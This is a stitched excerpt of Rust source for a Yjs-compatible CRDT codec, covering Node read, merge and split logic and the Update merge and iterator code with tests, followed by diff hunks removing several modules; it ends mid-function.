Self::Item(Somr::new(value))
}
}
impl Node {
pub fn new_skip(id: Id, len: u64) -> Self {
Self::Skip(Box::new(NodeLen { id, len }))
}
pub fn new_gc(id: Id, len: u64) -> Self {
Self::GC(Box::new(NodeLen { id, len }))
}
pub fn read<R: CrdtReader>(decoder: &mut R, id: Id) -> JwstCodecResult<Self> {
let info = decoder.read_info()?;
let first_5_bit = info & 0b11111;
match first_5_bit {
0 => {
let len = decoder.read_var_u64()?;
Ok(Node::new_gc(id, len))
}
10 => {
let len = decoder.read_var_u64()?;
Ok(Node::new_skip(id, len))
}
_ => {
let item = Somr::new(Item::read(decoder, id, info, first_5_bit)?);
if let Content::Type(ty) = &item.get().unwrap().content
&& let Some(mut ty) = ty.ty_mut()
{
ty.item = item.clone();
}
Ok(Node::Item(item))
}
}
}
pub fn id(&self) -> Id {
match self {
Node::GC(item) => item.id,
Node::Skip(item) => item.id,
Node::Item(item) => unsafe { item.get_unchecked() }.id,
}
}
pub fn client(&self) -> Client {
self.id().client
}
pub fn clock(&self) -> Clock {
self.id().clock
}
pub fn len(&self) -> u64 {
match self {
Self::GC(item) => item.len,
Self::Skip(item) => item.len,
Self::Item(item) => unsafe { item.get_unchecked() }.len(),
}
}
pub fn is_gc(&self) -> bool {
matches!(self, Self::GC { .. })
}
pub fn is_skip(&self) -> bool {
matches!(self, Self::Skip { .. })
}
pub fn is_item(&self) -> bool {
matches!(self, Self::Item(_))
}
pub fn as_item(&self) -> Somr<Item> {
if let Self::Item(item) = self {
item.clone()
} else {
Somr::none()
}
}
pub fn left(&self) -> Option<Self> {
if let Node::Item(item) = self {
item.get().map(|item| Node::Item(item.left.clone()))
} else {
None
}
}
pub fn right(&self) -> Option<Self> {
if let Node::Item(item) = self {
item.get().map(|item| Node::Item(item.right.clone()))
} else {
None
}
}
pub fn head(&self) -> Self {
let mut cur = self.clone();
while let Some(left) = cur.left() {
if left.is_item() {
cur = left
} else {
break;
}
}
cur
}
#[allow(dead_code)]
pub fn tail(&self) -> Self {
let mut cur = self.clone();
while let Some(right) = cur.right() {
if right.is_item() {
cur = right
} else {
break;
}
}
cur
}
pub fn flags(&self) -> ItemFlag {
if let Node::Item(item) = self {
item.get().unwrap().flags.clone()
} else {
// GC and Skip nodes are always treated as deleted
ItemFlag::from(item_flags::ITEM_DELETED)
}
}
pub fn last_id(&self) -> Option<Id> {
if let Node::Item(item) = self {
item.get().map(|item| item.last_id())
} else {
None
}
}
pub fn split_at(&self, offset: u64) -> JwstCodecResult<(Self, Self)> {
if let Self::Item(item) = self {
let item = item.get().unwrap();
debug_assert!(offset > 0 && item.len() > 1 && offset < item.len());
let id = item.id;
let right_id = Id::new(id.client, id.clock + offset);
let (left_content, right_content) = item.content.split(offset)?;
let left_item = Somr::new(Item::new(
id,
left_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
item.parent.clone(),
item.parent_sub.clone(),
));
let right_item = Somr::new(Item::new(
right_id,
right_content,
// let caller connect left <-> node <-> right
Somr::none(),
Somr::none(),
item.parent.clone(),
item.parent_sub.clone(),
));
Ok((Self::Item(left_item), Self::Item(right_item)))
} else {
Err(JwstCodecError::ItemSplitNotSupport)
}
}
#[inline]
#[allow(dead_code)]
pub fn countable(&self) -> bool {
self.flags().countable()
}
#[inline]
pub fn deleted(&self) -> bool {
self.flags().deleted()
}
pub fn merge(&mut self, right: Self) -> bool {
match (self, right) {
(Node::GC(left), Node::GC(right)) => {
left.len += right.len;
}
(Node::Skip(left), Node::Skip(right)) => {
left.len += right.len;
}
(Node::Item(lref), Node::Item(rref)) => {
let mut litem = unsafe { lref.get_mut_unchecked() };
let mut ritem = unsafe { rref.get_mut_unchecked() };
let llen = litem.len();
let parent_kind = match &litem.parent {
Some(Parent::Type(ty)) => ty.ty().map(|ty| ty.kind()),
_ => None,
};
if litem.id.client != ritem.id.client
// not same delete status
|| litem.deleted() != ritem.deleted()
// not clock continuous
|| litem.id.clock + litem.len() != ritem.id.clock
// not insertion continuous
|| Some(litem.last_id()) != ritem.origin_left_id
// not insertion continuous
|| litem.origin_right_id != ritem.origin_right_id
// not runtime continuous
|| litem.right != rref
{
return false;
}
match (&mut litem.content, &mut ritem.content) {
(Content::Deleted(l), Content::Deleted(r)) => {
*l += *r;
}
(Content::Json(l), Content::Json(r)) => {
l.extend(r.drain(0..));
}
(Content::String(l), Content::String(r)) => {
let allow_merge_string = matches!(parent_kind, Some(YTypeKind::Text | YTypeKind::XMLText));
if !allow_merge_string {
return false;
}
*l += r;
}
(Content::Any(l), Content::Any(r)) => {
l.extend(r.drain(0..));
}
_ => {
return false;
}
}
if let Some(Parent::Type(p)) = &litem.parent
&& let Some(parent) = p.ty_mut()
&& let Some(markers) = &parent.markers
{
markers.replace_marker(rref.clone(), lref.clone(), -(llen as i64));
}
if ritem.keep() {
litem.flags.set_keep()
}
litem.right = ritem.right.clone();
unsafe {
if litem.right.is_some() {
litem.right.get_mut_unchecked().left = lref.clone();
}
}
}
_ => {
return false;
}
}
true
}
}
impl From<Option<Node>> for Somr<Item> {
fn from(value: Option<Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
impl From<&Option<Node>> for Somr<Item> {
fn from(value: &Option<Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
impl From<Option<&Node>> for Somr<Item> {
fn from(value: Option<&Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use proptest::{collection::vec, prelude::*};
use super::{utils::ItemBuilder, *};
#[test]
fn test_struct_info() {
loom_model!({
{
let struct_info = Node::new_gc(Id::new(1, 0), 10);
assert_eq!(struct_info.len(), 10);
assert_eq!(struct_info.client(), 1);
assert_eq!(struct_info.clock(), 0);
}
{
let struct_info = Node::new_skip(Id::new(2, 0), 20);
assert_eq!(struct_info.len(), 20);
assert_eq!(struct_info.client(), 2);
assert_eq!(struct_info.clock(), 0);
}
{
let item = ItemBuilder::new()
.id((3, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(None)
.content(Content::String(String::from("content")))
.build();
let struct_info = Node::Item(Somr::new(item));
assert_eq!(struct_info.len(), 7);
assert_eq!(struct_info.client(), 3);
assert_eq!(struct_info.clock(), 0);
}
});
}
#[test]
fn test_read_write_struct_info() {
loom_model!({
let has_not_parent_id_and_has_parent = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(None)
.content(Content::String(String::from("content")))
.build(),
));
let has_not_parent_id_and_has_parent_with_key = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(Some(SmolStr::new_inline("parent_sub")))
.content(Content::String(String::from("content")))
.build(),
));
let has_parent_id = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(Some((1, 2).into()))
.right_id(Some((2, 5).into()))
.parent(None)
.parent_sub(None)
.content(Content::String(String::from("content")))
.build(),
));
let struct_infos = vec![
Node::new_gc((0, 0).into(), 42),
Node::new_skip((0, 0).into(), 314),
has_not_parent_id_and_has_parent,
has_not_parent_id_and_has_parent_with_key,
has_parent_id,
];
for info in struct_infos {
let mut encoder = RawEncoder::default();
info.write(&mut encoder).unwrap();
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let decoded = Node::read(&mut decoder, info.id()).unwrap();
assert_eq!(info, decoded);
}
});
}
#[cfg(not(loom))]
fn struct_info_round_trip(info: &mut Node) -> JwstCodecResult {
if let Node::Item(item) = info
&& let Some(item) = item.get_mut()
{
if !item.is_valid() {
return Ok(());
}
if item.content.countable() {
item.flags.set_countable();
}
}
let mut encoder = RawEncoder::default();
info.write(&mut encoder)?;
let ret = encoder.into_inner();
let mut decoder = RawDecoder::new(&ret);
let decoded = Node::read(&mut decoder, info.id())?;
assert_eq!(info, &decoded);
Ok(())
}
#[cfg(not(loom))]
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_struct_info(mut infos in vec(any::<Node>(), 0..10)) {
for info in &mut infos {
struct_info_round_trip(info).unwrap();
}
}
}
}
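`Node::split_at`, `Item::last_id` and the "clock continuous" check in `Node::merge` all rely on the same id arithmetic: an item with id `(client, clock)` and length `len` covers the clocks `clock..clock + len`. The following std-only sketch isolates that arithmetic. `Span` and its methods are hypothetical stand-ins, and the sketch ignores content, parents and flags entirely.

```rust
/// Hypothetical stand-in for the id and length of a node.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
struct Span {
    client: u64,
    clock: u64,
    len: u64,
}

impl Span {
    /// Clock of the last element covered by this span (assumes `len >= 1`).
    fn last_clock(&self) -> u64 {
        self.clock + self.len - 1
    }

    /// Split into `[clock, clock + offset)` and `[clock + offset, clock + len)`.
    /// Returns `None` unless `0 < offset < len`.
    fn split_at(&self, offset: u64) -> Option<(Span, Span)> {
        if offset == 0 || offset >= self.len {
            return None;
        }
        let left = Span { client: self.client, clock: self.clock, len: offset };
        let right = Span {
            client: self.client,
            clock: self.clock + offset,
            len: self.len - offset,
        };
        Some((left, right))
    }

    /// True when `right` starts exactly where `self` ends, for the same client.
    fn is_clock_continuous_with(&self, right: &Span) -> bool {
        self.client == right.client && self.clock + self.len == right.clock
    }
}
```

Splitting `Span { client: 1, clock: 10, len: 5 }` at offset 2 gives a left half starting at clock 10 with length 2 and a right half starting at clock 12 with length 3. The two halves are clock continuous again, which is one of the conditions a later merge checks.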
@@ -1,690 +0,0 @@
use std::{collections::VecDeque, ops::Range};
use super::*;
use crate::doc::StateVector;
#[derive(Debug, Default, Clone)]
pub struct Update {
pub(crate) structs: ClientMap<VecDeque<Node>>,
pub(crate) delete_set: DeleteSet,
/// all items that can't be integrated into the doc yet
/// any item with an inconsistent id clock or a missing dependency is put
/// here
pub(crate) pending_structs: ClientMap<VecDeque<Node>>,
/// missing state vector after applying updates
pub(crate) missing_state: StateVector,
/// delete set entries that can't be applied yet
pub(crate) pending_delete_set: DeleteSet,
}
impl<R: CrdtReader> CrdtRead<R> for Update {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_clients = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(num_of_clients.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_clients {
let num_of_structs = decoder.read_var_u64()? as usize;
let client = decoder.read_var_u64()?;
let mut clock = decoder.read_var_u64()?;
// same reason as above
let mut structs = VecDeque::with_capacity(num_of_structs.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_structs {
let struct_info = Node::read(decoder, Id::new(client, clock))?;
clock += struct_info.len();
structs.push_back(struct_info);
}
structs.shrink_to_fit();
map.insert(client, structs);
}
map.shrink_to_fit();
let delete_set = DeleteSet::read(decoder)?;
if !decoder.is_empty() {
return Err(JwstCodecError::UpdateNotFullyConsumed(decoder.len() as usize));
}
Ok(Update {
structs: map,
delete_set,
..Update::default()
})
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Update {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.structs.len() as u64)?;
let mut clients = self.structs.keys().copied().collect::<Vec<_>>();
// Descending
clients.sort_by(|a, b| b.cmp(a));
for client in clients {
let structs = self.structs.get(&client).unwrap();
encoder.write_var_u64(structs.len() as u64)?;
encoder.write_var_u64(client)?;
encoder.write_var_u64(structs.front().map(|s| s.clock()).unwrap_or(0))?;
for struct_info in structs {
struct_info.write(encoder)?;
}
}
self.delete_set.write(encoder)?;
Ok(())
}
}
impl Update {
// decode from ydoc v1
pub fn decode_v1<T: AsRef<[u8]>>(buffer: T) -> JwstCodecResult<Update> {
Update::read(&mut RawDecoder::new(buffer.as_ref()))
}
pub fn encode_v1(&self) -> JwstCodecResult<Vec<u8>> {
let mut encoder = RawEncoder::default();
self.write(&mut encoder)?;
Ok(encoder.into_inner())
}
pub(crate) fn iter(&mut self, state: StateVector) -> UpdateIterator<'_> {
UpdateIterator::new(self, state)
}
pub fn delete_set_iter(&mut self, state: StateVector) -> DeleteSetIterator<'_> {
DeleteSetIterator::new(self, state)
}
// move all pending structs and the pending delete set into this update's active fields
pub fn drain_pending_state(&mut self) {
debug_assert!(self.is_empty());
std::mem::swap(&mut self.pending_structs, &mut self.structs);
std::mem::swap(&mut self.pending_delete_set, &mut self.delete_set);
}
pub fn merge<I: IntoIterator<Item = Update>>(updates: I) -> Update {
let mut merged = Update::default();
Self::merge_into(&mut merged, updates);
merged
}
pub fn merge_into<I: IntoIterator<Item = Update>>(target: &mut Update, updates: I) {
for update in updates {
target.delete_set.merge(&update.delete_set);
for (client, structs) in update.structs {
let iter = structs.into_iter().filter(|p| !p.is_skip());
if let Some(merged_structs) = target.structs.get_mut(&client) {
merged_structs.extend(iter);
} else {
target.structs.insert(client, iter.collect());
}
}
}
for structs in target.structs.values_mut() {
structs.make_contiguous().sort_by_key(|s| s.id().clock);
// insert [Node::Skip] if structs[index].id().clock + structs[index].len() <
// structs[index + 1].id().clock
let mut index = 0;
let mut merged_index = vec![];
// `index + 1 < len` avoids a usize underflow when `structs` is empty
while index + 1 < structs.len() {
let cur = &structs[index];
let next = &structs[index + 1];
let clock_end = cur.id().clock + cur.len();
let next_clock = next.id().clock;
if next_clock > clock_end {
structs.insert(
index + 1,
Node::new_skip((cur.id().client, clock_end).into(), next_clock - clock_end),
);
index += 1;
} else if cur.id().clock == next_clock {
if cur.deleted() == next.deleted()
&& cur.last_id() == next.last_id()
&& cur.left() == next.left()
&& cur.right() == next.right()
{
// merge two nodes, mark the index
merged_index.push(index + 1);
} else {
debug!("merge failed: {cur:?} {next:?}")
}
}
index += 1;
}
{
// prune the merged nodes
let mut new_structs = VecDeque::with_capacity(structs.len() - merged_index.len());
let mut next_remove_idx = 0;
for (idx, val) in structs.drain(..).enumerate() {
if next_remove_idx < merged_index.len() && idx == merged_index[next_remove_idx] {
next_remove_idx += 1;
} else {
new_structs.push_back(val);
}
}
structs.extend(new_structs);
}
}
}
pub fn is_content_empty(&self) -> bool {
self.structs.is_empty()
}
pub fn is_empty(&self) -> bool {
self.structs.is_empty() && self.delete_set.is_empty()
}
pub fn is_pending_empty(&self) -> bool {
self.pending_structs.is_empty() && self.pending_delete_set.is_empty()
}
}
pub(crate) struct UpdateIterator<'a> {
update: &'a mut Update,
// --- local iterator state ---
/// current state vector from store
state: StateVector,
/// all client ids sorted ascending
client_ids: Vec<Client>,
/// current id of client of the updates we're processing
cur_client_id: Option<Client>,
/// stack of items deferred from previous iterations; they take priority
/// over the remaining updates in the next iteration
stack: Vec<Node>,
}
impl<'a> UpdateIterator<'a> {
pub fn new(update: &'a mut Update, state: StateVector) -> Self {
let mut client_ids = update.structs.keys().cloned().collect::<Vec<_>>();
client_ids.sort();
let cur_client_id = client_ids.pop();
UpdateIterator {
update,
state,
client_ids,
cur_client_id,
stack: Vec::new(),
}
}
/// iterate the client ids until we find the next client that still has
/// updates to consume
///
/// note:
/// the current client id is checked first, to make sure its update queue
/// is not empty yet
fn next_client(&mut self) -> Option<Client> {
while let Some(client_id) = self.cur_client_id {
match self.update.structs.get(&client_id) {
Some(refs) if !refs.is_empty() => {
self.cur_client_id.replace(client_id);
return self.cur_client_id;
}
_ => {
self.update.structs.remove(&client_id);
self.cur_client_id = self.client_ids.pop();
}
}
}
None
}
/// update the missing state vector,
/// recording the smallest missing clock for the client.
fn update_missing_state(&mut self, client: Client, clock: Clock) {
self.update.missing_state.set_min(client, clock);
}
/// any time we can't apply an update during the iteration,
/// move every item on the stack, together with the remaining structs of
/// its client, into the pending structs
fn add_stack_to_rest(&mut self) {
for s in self.stack.drain(..) {
let client = s.id().client;
let unapplicable_items = self.update.structs.remove(&client);
if let Some(mut items) = unapplicable_items {
items.push_front(s);
self.update.pending_structs.insert(client, items);
} else {
self.update.pending_structs.insert(client, [s].into());
}
self.client_ids.retain(|&c| c != client);
}
}
/// check whether the current update's dependencies (left, right, parent)
/// have already been consumed and recorded; return the client of the first
/// missing one if not.
fn get_missing_dep(&self, struct_info: &Node) -> Option<Client> {
if let Some(item) = struct_info.as_item().get() {
let id = item.id;
if let Some(left) = &item.origin_left_id
&& left.client != id.client
&& left.clock >= self.state.get(&left.client)
{
return Some(left.client);
}
if let Some(right) = &item.origin_right_id
&& right.client != id.client
&& right.clock >= self.state.get(&right.client)
{
return Some(right.client);
}
if let Some(parent) = &item.parent {
match parent {
Parent::Id(parent_id)
if parent_id.client != id.client && parent_id.clock >= self.state.get(&parent_id.client) =>
{
return Some(parent_id.client);
}
_ => {}
}
}
}
None
}
fn next_candidate(&mut self) -> Option<Node> {
let mut cur = None;
if !self.stack.is_empty() {
cur.replace(self.stack.pop().unwrap());
} else if let Some(client) = self.next_client() {
// Safety:
// client index of updates and update length are both checked in next_client
// safe to use unwrap
cur.replace(self.update.structs.get_mut(&client).unwrap().pop_front().unwrap());
}
cur
}
}
impl Iterator for UpdateIterator<'_> {
type Item = (Node, u64);
fn next(&mut self) -> Option<Self::Item> {
// fetch the first candidate from stack or updates
let mut cur = self.next_candidate();
while let Some(cur_update) = cur.take() {
let id = cur_update.id();
if cur_update.is_skip() {
cur = self.next_candidate();
continue;
} else if !self.state.contains(&id) {
// missing local state of same client
// can't apply the continuous updates from same client
// push it onto the stack and mark all items in the stack as unapplicable
self.stack.push(cur_update);
self.update_missing_state(id.client, id.clock - 1);
self.add_stack_to_rest();
} else {
let id = cur_update.id();
let dep = self.get_missing_dep(&cur_update);
// some dependency is missing, we need to turn to iterate the dependency first.
if let Some(dep) = dep {
self.stack.push(cur_update);
match self.update.structs.get_mut(&dep) {
Some(updates) if !updates.is_empty() => {
// iterate the dependency client first
cur.replace(updates.pop_front().unwrap());
continue;
}
// the dependency's updates are already drained,
// so move all stack items to the unapplicable store
_ => {
self.update_missing_state(dep, self.state.get(&dep));
self.add_stack_to_rest();
}
}
} else {
// we finally find the first applicable update
let local_state = self.state.get(&id.client);
// we've already checked that the local state is greater than or equal to the
// current update's clock, so the offset here will never be negative
let offset = local_state - id.clock;
if offset == 0 || offset < cur_update.len() {
self.state.set_max(id.client, id.clock + cur_update.len());
return Some((cur_update, offset));
}
}
}
cur = self.next_candidate();
}
// all done
None
}
}
pub struct DeleteSetIterator<'a> {
update: &'a mut Update,
/// current state vector from store
state: StateVector,
}
impl<'a> DeleteSetIterator<'a> {
pub fn new(update: &'a mut Update, state: StateVector) -> Self {
DeleteSetIterator { update, state }
}
}
impl Iterator for DeleteSetIterator<'_> {
type Item = (Client, Range<u64>);
fn next(&mut self) -> Option<Self::Item> {
while let Some(client) = self.update.delete_set.keys().next().cloned() {
let deletes = self.update.delete_set.get_mut(&client).unwrap();
let local_state = self.state.get(&client);
while let Some(range) = deletes.pop() {
let start = range.start;
let end = range.end;
if start < local_state {
if local_state < end {
// state partially missing
// [start..end)
// ^ local_state in between
// // split
// [start..local_state) [local_state..end)
// ^^^^^ unapplicable
self
.update
.pending_delete_set
.add(client, local_state, end - local_state);
return Some((client, start..local_state));
}
return Some((client, range));
} else {
// all state missing
self.update.pending_delete_set.add(client, start, end - start);
}
}
self.update.delete_set.remove(&client);
}
None
}
}
#[cfg(test)]
mod tests {
use std::{num::ParseIntError, path::PathBuf};
use serde::Deserialize;
use super::*;
use crate::doc::common::OrderRange;
fn struct_item(id: (Client, Clock), len: usize) -> Node {
Node::Item(Somr::new(
ItemBuilder::new()
.id(id.into())
.content(Content::String("c".repeat(len)))
.build(),
))
}
fn parse_doc_update(input: Vec<u8>) -> JwstCodecResult<Update> {
Update::decode_v1(input)
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_parse_doc() {
let docs = [
(include_bytes!("../../fixtures/basic.bin").to_vec(), 1, 188),
(include_bytes!("../../fixtures/database.bin").to_vec(), 1, 149),
(include_bytes!("../../fixtures/large.bin").to_vec(), 1, 9036),
(include_bytes!("../../fixtures/with-subdoc.bin").to_vec(), 2, 30),
(
include_bytes!("../../fixtures/edge-case-left-right-same-node.bin").to_vec(),
2,
243,
),
];
for (doc, clients, structs) in docs {
let update = parse_doc_update(doc).unwrap();
assert_eq!(update.structs.len(), clients);
assert_eq!(update.structs.iter().map(|s| s.1.len()).sum::<usize>(), structs);
}
}
fn decode_hex(s: &str) -> Result<Vec<u8>, ParseIntError> {
(0..s.len())
.step_by(2)
.map(|i| u8::from_str_radix(&s[i..i + 2], 16))
.collect()
}
#[allow(dead_code)]
#[derive(Deserialize, Debug)]
struct Data {
id: u64,
workspace: String,
timestamp: String,
blob: String,
}
#[ignore = "just for local data test"]
#[test]
fn test_parse_local_doc() {
let json = serde_json::from_slice::<Vec<Data>>(include_bytes!("../../fixtures/local_docs.json")).unwrap();
for ws in json {
let data = &ws.blob[5..=(ws.blob.len() - 2)];
if let Ok(data) = decode_hex(data) {
match parse_doc_update(data.clone()) {
Ok(update) => {
println!(
"workspace: {}, global structs: {}, total structs: {}",
ws.workspace,
update.structs.len(),
update.structs.iter().map(|s| s.1.len()).sum::<usize>()
);
}
Err(_e) => {
std::fs::write(
PathBuf::from("./src/fixtures/invalid").join(format!("{}.ydoc", ws.workspace)),
data,
)
.unwrap();
println!("doc error: {}", ws.workspace);
}
}
} else {
println!("error origin data: {}", ws.workspace);
}
}
}
#[test]
fn test_update_iterator() {
loom_model!({
let mut update = Update {
structs: ClientMap::from_iter([
(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
Node::new_skip((0, 2).into(), 1),
]),
),
(
1,
VecDeque::from([
struct_item((1, 0), 1),
Node::Item(Somr::new(
ItemBuilder::new()
.id((1, 1).into())
.left_id(Some((0, 1).into()))
.content(Content::String("c".repeat(2)))
.build(),
)),
]),
),
]),
..Update::default()
};
let mut iter = update.iter(StateVector::default());
assert_eq!(iter.next().unwrap().0.id(), (1, 0).into());
assert_eq!(iter.next().unwrap().0.id(), (0, 0).into());
assert_eq!(iter.next().unwrap().0.id(), (0, 1).into());
assert_eq!(iter.next().unwrap().0.id(), (1, 1).into());
assert_eq!(iter.next(), None);
});
}
#[test]
fn test_update_iterator_with_missing_state() {
loom_model!({
let mut update = Update {
// an item with higher sequence id than local state
structs: ClientMap::from_iter([(0, VecDeque::from([struct_item((0, 4), 1)]))]),
..Update::default()
};
let mut iter = update.iter(StateVector::from([(0, 3)]));
assert_eq!(iter.next(), None);
assert!(!update.pending_structs.is_empty());
assert_eq!(
update.pending_structs.get_mut(&0).unwrap().pop_front().unwrap().id(),
(0, 4).into()
);
assert!(!update.missing_state.is_empty());
assert_eq!(update.missing_state.get(&0), 3);
});
}
#[test]
fn test_delete_set_iterator() {
let mut update = Update {
delete_set: DeleteSet::from([(0, vec![(0..2), (3..5)])]),
..Update::default()
};
let mut iter = update.delete_set_iter(StateVector::from([(0, 10)]));
assert_eq!(iter.next().unwrap(), (0, 0..2));
assert_eq!(iter.next().unwrap(), (0, 3..5));
assert_eq!(iter.next(), None);
}
#[test]
fn test_delete_set_with_missing_state() {
let mut update = Update {
delete_set: DeleteSet::from([(0, vec![(3..5), (7..12), (13..15)])]),
..Update::default()
};
let mut iter = update.delete_set_iter(StateVector::from([(0, 10)]));
assert_eq!(iter.next().unwrap(), (0, 3..5));
assert_eq!(iter.next().unwrap(), (0, 7..10));
assert_eq!(iter.next(), None);
assert!(!update.pending_delete_set.is_empty());
assert_eq!(
update.pending_delete_set.get(&0).unwrap(),
&OrderRange::from(vec![(10..12), (13..15)])
);
}
#[test]
fn should_add_skip_when_clock_not_continuous() {
loom_model!({
let update = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
struct_item((0, 10), 1),
Node::new_gc((0, 20).into(), 10),
]),
)]),
..Default::default()
};
let merged = Update::merge([update]);
assert_eq!(
merged.structs.get(&0).unwrap(),
&VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
Node::new_skip((0, 2).into(), 8),
struct_item((0, 10), 1),
Node::new_skip((0, 11).into(), 9),
Node::new_gc((0, 20).into(), 10),
])
);
});
}
#[test]
fn merged_update_should_not_be_released_in_next_turn() {
loom_model!({
let update = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
struct_item((0, 10), 1),
Node::new_gc((0, 20).into(), 10),
]),
)]),
..Default::default()
};
let merged = Update::merge([update]);
let update2 = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([struct_item((0, 30), 1), Node::new_gc((0, 32).into(), 1)]),
)]),
..Default::default()
};
let merged2 = Update::merge([update2, merged]);
assert_eq!(merged2.structs.get(&0).unwrap().len(), 9);
});
}
}
@@ -1,97 +0,0 @@
use super::*;
pub(crate) struct ItemBuilder {
item: Item,
}
#[allow(dead_code)]
impl ItemBuilder {
pub fn new() -> ItemBuilder {
Self { item: Item::default() }
}
pub fn id(mut self, id: Id) -> ItemBuilder {
self.item.id = id;
self
}
pub fn left(mut self, left: Somr<Item>) -> ItemBuilder {
if let Some(l) = left.get() {
self.item.origin_left_id = Some(l.last_id());
self.item.left = left;
}
self
}
pub fn right(mut self, right: Somr<Item>) -> ItemBuilder {
if let Some(r) = right.get() {
self.item.origin_right_id = Some(r.id);
self.item.right = right;
}
self
}
pub fn left_id(mut self, left_id: Option<Id>) -> ItemBuilder {
self.item.origin_left_id = left_id;
self
}
pub fn right_id(mut self, right_id: Option<Id>) -> ItemBuilder {
self.item.origin_right_id = right_id;
self
}
pub fn parent(mut self, parent: Option<Parent>) -> ItemBuilder {
self.item.parent = parent;
self
}
#[allow(dead_code)]
pub fn parent_sub(mut self, parent_sub: Option<SmolStr>) -> ItemBuilder {
self.item.parent_sub = parent_sub;
self
}
pub fn content(mut self, content: Content) -> ItemBuilder {
self.item.content = content;
self
}
pub fn flags(mut self, flags: ItemFlag) -> ItemBuilder {
self.item.flags = flags;
self
}
pub fn build(self) -> Item {
if self.item.content.countable() {
self.item.flags.set(item_flags::ITEM_COUNTABLE);
}
self.item
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_item_builder() {
loom_model!({
let item = ItemBuilder::new()
.id(Id::new(0, 1))
.left_id(Some(Id::new(2, 3)))
.right_id(Some(Id::new(4, 5)))
.parent(Some(Parent::String("test".into())))
.content(Content::Any(vec![Any::String("Hello".into())]))
.build();
assert_eq!(item.id, Id::new(0, 1));
assert_eq!(item.origin_left_id, Some(Id::new(2, 3)));
assert_eq!(item.origin_right_id, Some(Id::new(4, 5)));
assert!(matches!(item.parent, Some(Parent::String(text)) if text == "test"));
assert_eq!(item.parent_sub, None);
assert_eq!(item.content, Content::Any(vec![Any::String("Hello".into())]));
});
}
}
@@ -1,5 +0,0 @@
mod items;
pub(crate) use items::*;
use super::*;
@@ -1,9 +0,0 @@
mod range;
mod somr;
mod state;
pub use range::*;
pub use somr::*;
pub use state::*;
use super::*;
@@ -1,466 +0,0 @@
use std::{collections::VecDeque, mem, ops::Range};
#[derive(Debug, PartialEq, Eq, Clone)]
pub enum OrderRange {
Range(Range<u64>),
Fragment(VecDeque<Range<u64>>),
}
impl Default for OrderRange {
fn default() -> Self {
Self::Range(0..0)
}
}
impl From<Range<u64>> for OrderRange {
fn from(range: Range<u64>) -> Self {
Self::Range(range)
}
}
impl From<Vec<Range<u64>>> for OrderRange {
fn from(value: Vec<Range<u64>>) -> Self {
Self::Fragment(value.into_iter().collect())
}
}
impl From<VecDeque<Range<u64>>> for OrderRange {
fn from(value: VecDeque<Range<u64>>) -> Self {
Self::Fragment(value)
}
}
#[inline]
fn is_continuous_range(lhs: &Range<u64>, rhs: &Range<u64>) -> bool {
lhs.end >= rhs.start && lhs.start <= rhs.end
}
impl OrderRange {
pub fn ranges_len(&self) -> usize {
match self {
OrderRange::Range(_) => 1,
OrderRange::Fragment(ranges) => ranges.len(),
}
}
pub fn is_empty(&self) -> bool {
match self {
OrderRange::Range(range) => range.is_empty(),
OrderRange::Fragment(vec) => vec.is_empty(),
}
}
pub fn contains(&self, clock: u64) -> bool {
match self {
OrderRange::Range(range) => range.contains(&clock),
OrderRange::Fragment(ranges) => ranges.iter().any(|r| r.contains(&clock)),
}
}
fn check_range_covered(old_vec: &[Range<u64>], new_vec: &[Range<u64>]) -> bool {
let mut old_iter = old_vec.iter();
let mut next_old = old_iter.next();
let mut new_iter = new_vec.iter().peekable();
let mut next_new = new_iter.next();
'new_loop: while let Some(new_range) = next_new {
while let Some(old_range) = next_old {
if old_range.start < new_range.start || old_range.end > new_range.end {
if new_iter.peek().is_some() {
next_new = new_iter.next();
continue 'new_loop;
} else {
return false;
}
}
next_old = old_iter.next();
if let Some(next_old) = &next_old
&& next_old.start > new_range.end
{
continue;
}
}
next_new = new_iter.next();
}
true
}
/// diff_range returns the parts of the new range that are not in the current
/// (old) range. The current range must be covered by the new range;
/// otherwise an empty list is returned.
pub fn diff_range(&self, new_range: &OrderRange) -> Vec<Range<u64>> {
let old_vec = self.clone().into_iter().collect::<Vec<_>>();
let new_vec = new_range.clone().into_iter().collect::<Vec<_>>();
if !Self::check_range_covered(&old_vec, &new_vec) {
return Vec::new();
}
let mut diffs = Vec::new();
let mut old_idx = 0;
for new_range in &new_vec {
let mut overlap_ranges = Vec::new();
while old_idx < old_vec.len() && old_vec[old_idx].start <= new_range.end {
overlap_ranges.push(old_vec[old_idx].clone());
old_idx += 1;
}
if overlap_ranges.is_empty() {
diffs.push(new_range.clone());
} else {
let mut last_end = overlap_ranges[0].start;
